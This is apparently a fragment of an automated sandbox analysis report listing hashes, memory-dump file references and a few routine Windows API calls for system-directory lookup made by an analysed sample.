                                                    • Opcode ID: 9a77750c210f7d8076cc843d4a3ce048e1eeb59b7f8790a6677c9d93a81d3328
                                                    • Instruction ID: 0426bb50b4811762cb17ebf1b30d1f41a75a9320b67f23fe2dcecca718f1a2a4
                                                    • Opcode Fuzzy Hash: 9a77750c210f7d8076cc843d4a3ce048e1eeb59b7f8790a6677c9d93a81d3328
                                                    • Instruction Fuzzy Hash: 5EE06D702007258BD760AF25E8067527BE0AF44304F04891EE846C6341DFB8D548EB91
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00F30091
                                                      • Part of subcall function 00F6C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00F3027A,?), ref: 00F6C6E7
                                                      • Part of subcall function 00F6C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F6C6F9
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F30289
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 582185067-3257408948
                                                    • Opcode ID: 0530a0bb4ecd4ef49084457c6eb201f5e7c591e81c170347ed806fc7d00463a7
                                                    • Instruction ID: 281b167db28d7b95a594f651ec41aa830f42bb1a3c2241ea91fd924094b60edd
                                                    • Opcode Fuzzy Hash: 0530a0bb4ecd4ef49084457c6eb201f5e7c591e81c170347ed806fc7d00463a7
                                                    • Instruction Fuzzy Hash: 54F0C0B1805109DFCB59DB54C9A87FD7BB8AB48314F541096E146B2160CF755F44EF21